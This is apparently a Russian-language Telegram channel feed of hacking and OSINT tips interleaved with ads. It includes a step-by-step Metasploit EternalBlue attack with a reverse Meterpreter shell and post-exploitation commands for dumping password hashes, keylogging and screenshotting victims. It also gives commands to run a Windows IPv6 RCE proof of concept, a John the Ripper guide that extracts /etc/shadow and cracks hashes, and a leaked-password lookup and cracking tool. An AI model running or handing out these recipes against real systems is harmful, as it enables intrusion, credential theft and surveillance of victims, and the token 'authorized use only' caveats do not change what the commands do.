CodeGuard: CyberSec Edition

📡 5 площадок для CTF-соревнований (бесплатно) 1. picoCTF — от университета Карнеги-Меллон. Лучший старт для новичков. Ссылка 2. CTFtime — агрегатор всех CTF в мире. Календарь, команды, рейтинги. Ссылка 3. RingZer0 — онлайн-площадка с тысячами задач (SQLi, крипто, форензика). Ссылка 4. TryHackMe CTF — комнаты с таймером, как на настоящих соревнованиях. Ссылка 5. HackTheBox CTF — регулярные соревнования на реальных машинах. Ссылка 🎁 Бонус: Начните с picoCTF — там есть гайды для полных новичков. 😈 CodeGuard: PySec Edition | Чат

🎯 Metasploit за 5 минут — первый эксплойт Текст: 1. Запуск:

sudo msfconsole

2. Поиск модуля для EternalBlue (MS17-010):

search ms17-010

3. Используем модуль:

use exploit/windows/smb/ms17_010_eternalblue

4. Настройка (IP цели и своя слушающая машина):

set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp

5. Атака:

run

6. Получили Meterpreter shell:

sysinfo
getuid
shell

Полезные команды внутри Meterpreter: hashdump — вытащить хеши паролей screenshot — скриншот экрана жертвы keyscan_start / keyscan_dump — кейлоггер upload /file /путь — загрузить файл ⚠️ Только на своих системах или с разрешения. 😈 CodeGuard: PySec Edition | Чат

🥷 Ищем ИБ и OSINT специалистов. Релокейт, удалёнка, платим много! - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @jobs_ib 🤖 ML & DS 👩‍💻 DevOps 👨‍✈️ ИБ & OSINT 👣 Go 👩‍💻 Mobile 👩‍💻 C# 👩‍💻 Node.js 👩‍💻 Python 🔎 QA 👩‍💻 Java 👩‍💻 UX/UI 👩‍💻 Frontend 🖼️ PHP 📋 Analyst 💼 1C 🖥 SQL 👩‍💻 IT HR Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.

⚔️ MITRE ATT&CK Navigator — визуализируй покрытие техник атак Планируете тест на проникновение или проверяете, насколько SOC готов к реальным атакам? 🔗 Сайт Что это: Интерактивная тепловая карта всех тактик и техник MITRE ATT&CK Как использовать:

👉Оцените покрытие вашей защиты (синие команды) 👉Спланируйте, какие техники использовать в Red Team 👉Экспортируйте/импортируйте слой в JSON

Для кого: Синих команд (проверить детекцию техник), красных команд (спланировать маршрут атаки), аналитиков угроз. Почему удобно: Можно добавить скоринг, комментарии и цвета для каждой техники. 😈 CodeGuard: PySec Edition | Чат

🤩 Мы для вас нашли лютый блог Ибэшника, который ведёт человек с 15-ти летним стажем работы. В канале он рассказывает: 🟢Какими инструментами он пользуется при работе 🟢Какими законными и подзаконными актами он руководствуется 🟢Как правильно делать обращения в ФСТЭК 🟢Так же рассказывает о инцидентах, с которыми встречается при работе 🫵 Карманный хакер — твой путеводитель в мир ИБ!

💀 CVE-2024-38063 — Zero-click RCE через IPv6 в Windows Август 2024. Уязвимость в Windows IPv6 stack позволяет удалённо выполнить код без клика и даже без логина . CVSS: 9.8 (критическая) Суть: Целочисленный андерфлоу в tcpip.sys. Один неправильный IPv6-пакет с фрагментами — и ядро падает (BSOD) или открывает доступ . Где искать: Windows 10/11 c выключенными обновлениями за август 2024. Особенно серверы, где IPv6 не отключали. Как проверить: Запустить PoC на Linux против целевой Windows (только на своих тестовых!) :

git clone https://github.comAvidan1/CVE-2024-38063
python3 CVE-2024-38063.py

Что искать в логах: BSOD stop code 0x00000001 в tcpip.sys Фикс: Поставить патч от Microsoft (август 2024) или отключить IPv6 . Почему страшно: Это zero-click — вам даже не надо открывать письмо или переходить по ссылке. Достаточно получить IPv6-пакет по сети 😈 CodeGuard: PySec Edition | Чат

Кто платит за последствия кибератаки? Российский бизнес всё чаще сталкивается не только с угрозой взлома, но и с финансовыми потерями после инцидентов. При этом рынок киберстрахования до сих пор остаётся серой зоной для многих компаний. Кибердом запускает исследование практик управления киберрисками, чтобы понять, как бизнес сегодня: ✔️ распределяет ответственность; ✔️ компенсирует убытки; ✔️ инвестирует в защиту; ✔️ использует киберстрахование на практике. К участию приглашаются CISO, IT-директора, руководители и специалисты в сфере кибербезопасности. 🔥 Пройти опрос Опрос анонимный. Результаты исследования будут представлены на закрытом мероприятии в Кибердоме, а участники получат приглашение и доступ к аналитике рынка. #реклама О рекламодателе

🚀 GoSearch — шерлок на стероидах (ищет ещё и утечки паролей) Sherlock хорош, но умирает. GoSearch написан на Go, летает быстрее и ищет глубже . Что умеет:

🔵Ищет по 300+ сайтам (соцсети, GitHub, форумы) 🔵Проверяет 900k утекших паролей через HudsonRock API 🔵Ищет по ProxyNova (3.2 млрд записей) и BreachDirectory (18 млрд) 🔵Пытается взломать пароли через Weakpass

Установка:

git clone https://github.com/ibnaleem/gosearch cd gosearch go build

Запуск:

./gosearch -u username --no-false-positives

Фишка против Sherlock: Цветовая индикация — жёлтые результаты под вопросом, зелёные — 100% попадание 😈 CodeGuard: PySec Edition | Чат

🔐 Когда NGFW становится единой точкой отказа, под угрозой уже не только firewall, а вся инфраструктура. Если межсетевой экран перестаёт отвечать, пользователи теряют доступ к сервисам, сегменты сети изолируются, а простой превращается в проблему для бизнеса. ✅ 10 июня на бесплатном практическом вебинаре УЦ «Фаст Лейн» разберём отказоустойчивость UserGate NGFW и что происходит при переключении узлов кластера. Программа: 🔹 FHRP-протоколы и VRRP 🔹 Active-passive и active-active 🔹 Условия переключения: отказ интерфейса, потеря шлюза, смена роли 🔹 GARP и ARP-таблицы клиентов 🔹 Анализ VRRP и ARP-трафика в Wireshark Кому полезно: сетевым инженерам, ИБ-специалистам, системным администраторам, пользователям UserGate NGFW. Ведущий - практикующий эксперт, сертифицированный инструктор UserGate, Eltex и «Код Безопасности». 📅 10 июня | 12:00 или 19:00 (МСК) 🔗 Зарегистрироваться. #реклама О рекламодателе

🐙 Awesome Infosec — коллекция бесплатных курсов по кибербезопасности Хотите учиться, но не знаете, с чего начать? Готовый список лучших бесплатных материалов. 🔗 GitHub ⭐️1k+ Что внутри: Кураторская подборка ресурсов — от академических курсов до лабораторий и CTF. Разделы:

🔵Massive Online Open Courses — Computer Security от Stanford, криптография, хардверная безопасность  🔵Academic Courses — NYU Tandon Hack Night, Offensive Computer Security от FSU, Exploitation от RPI  🔵Laboratories — практические стенды 🔵CTF — площадки для тренировок 🔵SecurityTube Playlists — видео-лекции

Кому зайдёт: Новичкам и профессионалам, которые хотят систематизировать знания. 😈 CodeGuard: PySec Edition | Чат

👩‍💻 Всем программистам посвящается! Вот 14 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 👩‍💻 IT Новости — t.me/it_ready 🤖 AI & ML — t.me/neuro_ready 👩‍💻 Frontend — t.me/frontend_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Linux — t.me/linux_ready 👩‍💻 Java — t.me/java_ready 📖 IT Книги — t.me/books_ready 📱 JavaScript — t.me/javascript_ready 🖼️ DevOps — t.me/devops_ready 🖥 Design — t.me/design_ready 📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!

🔍 Шпаргалка по lsof — кто и что открыл в системе 1. Какие файлы открыты у процесса:

lsof -p [PID]

2. Какой процесс слушает порт:

lsof -i :80

3. Все сетевые соединения:

lsof -i -P -n

4. Кто открыл файл (и удалил, но не закрыл):

lsof /path/to/file

5. Открытые файлы пользователя:

lsof -u username

6. Все процессы, которые используют папку (даже если она удалена):

lsof +D /path/to/folder

7. Найти свой SSH-ключ в памяти процессов:

lsof | grep "id_rsa"

8. Сетевые соединения с деталями процессов:

lsof -i -n -P | grep ESTABLISHED

Сохраняйте 🔖 😈 CodeGuard: PySec Edition | Чат

⚔️ Legion — графический пентест-фреймворк на Python 🔗 GitHub  ⭐️ 1k+ Что внутри: Готовый инструмент для автоматизации пентеста с веб-интерфейсом. В основе — Nmap, Nikto, Hydra, Dirb, что есть в Kali. Особенности:

🔵Автоматическое сканирование портов и сервисов 🔵Поиск уязвимостей через базу CVE 🔵Генерация отчётов 🔵Легко развернуть в Docker

Установка:

git clone https://github.com/GoVanguard/legion.git
cd legion
sudo ./start-legion.sh

😈 CodeGuard: PySec Edition | Чат

Сетка работает красиво до первого движения рынка А вот SilentGain не обещает вам сказку про кнопку 😬 БАБЛО 🚫 Здесь показывают, как автоматическая стратегия работает на реальных сделках: где плюс, где просадка, где стоит защита и почему доходность не бывает без риска. 📉 В проекте разбирают торговлю на золоте так, чтобы было понятно даже детям. Переходи в бесплатного бота. Без подписок. Без настроек. ⤵️ https://t.me/+Lu-4K0h4-H41YjNi

🐧 Прохождение Bashed (HackTheBox): от веб-шелла до Root 🔗 Ссылка Практический разбор одного из лучших стартовых стендов для новичков — машины Bashed . Что вас ждет в этом видео: ⚫️Начальная атака: Находим скрытую папку /dev и получаем доступ к веб-шеллу phpbash . ⚫️Повышение привилегий: Находим пользователя scriptmanager, который может выполнять всё без пароля (sudo -l) . ⚫️Результат: Модифицируем Python-скрипт, который запускается от имени root по расписанию, и получаем полный контроль над системой . Для кого: Идеально для новичков и тех, кто готовится к сертификации OSCP. 😈 CodeGuard: PySec Edition | Чат

🛠 Pentest-Tools — веб-интерфейс для пентеста 🔗 Сайт Что внутри: 20+ инструментов в браузере — сканирование портов, брутфорс, проверка SQLi, XSS, SSRF, whois, DNS. Чем удобно:

🔵Не нужно ничего устанавливать 🔵Есть бесплатные лимиты 🔵Интеграция с API

Для кого: Новичкам и тем, у кого нет доступа к мощному железу. 🎁 Бонусный инструмент: Проверка заголовков безопасности — покажет, какие заголовки (CSP, HSTS, X-Frame-Options) отсутствуют на сайте. 😈 CodeGuard: PySec Edition | Чат

IT-сфера снова переживает бурные времена. AI-технологии влияют на классические подходы, а компании, которые не успевают адаптироваться - теряют позиции. В этой ситуации решает не количество информации, а её качество. Мы собрали папку каналов для тех, кто не просто «следит за трендами», а реально работает с цифрами, тестирует AI инструменты и адаптирует свои процессы под новые реалии. Только практические советы и реальные кейсы👇🏻 Сохранить папку 📨 Доступно 48 часов❗️

🔓 John the Ripper — взлом хешей паролей по шагам 1. Установка:

sudo apt install john

2. Извлечение хешей (Linux shadow):

unshadow /etc/passwd /etc/shadow > hashes.txt

3. Словарная атака:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

4. Атака по маске (8 цифр):

john --mask=?d?d?d?d?d?d?d?d hashes.txt

5. Показать подобранные пароли:

john --show hashes.txt

6. Атака на NTLM-хеш Windows:

john --format=nt hash.txt --wordlist=rockyou.txt

⚠️ Только на своих системах или с разрешения. 😈 CodeGuard: PySec Edition | Чат

«Опять не работает ни один VPN! Сколько уже можно😡» Если тоже знакома ситуация, то стоит попробовать Zent. Это единственный стабильно рабочий обход ограничений и даже Белых списков Попробуй сейчас, чтобы не страдать от плохих обходов блокировок👇 https://t.me/vpnzent_bot?start=code2

🕷 SpiderFoot — автоматический OSINT-сканер с веб-интерфейсом Запустил — ушёл пить кофе — получил отчёт по цели. 🔧 Тулза: SpiderFoot (github.com/smicallef/spiderfoot) Установка:

git clone https://github.com/smicallef/spiderfoot
cd spiderfoot
pip install -r requirements.txt
python3 sf.py

Открыть http://localhost:5001 Что умеет:

🔵Whois, DNS, поддомены 🔵Поиск email, соцсетей, GitHub 🔵Проверка утечек (HaveIBeenPwned) 🔵Интеграция с Shodan, VirusTotal

🔥 Кейс: OSINT-специалист сканировал домен компании и нашёл поддомен backup.old.company.com с открытым FTP-доступом и дампом БД. Атака через забытый поддомен — один из самых частых векторов. 💡  Совет: Запускайте через VPN. 😈 CodeGuard: PySec Edition | Чат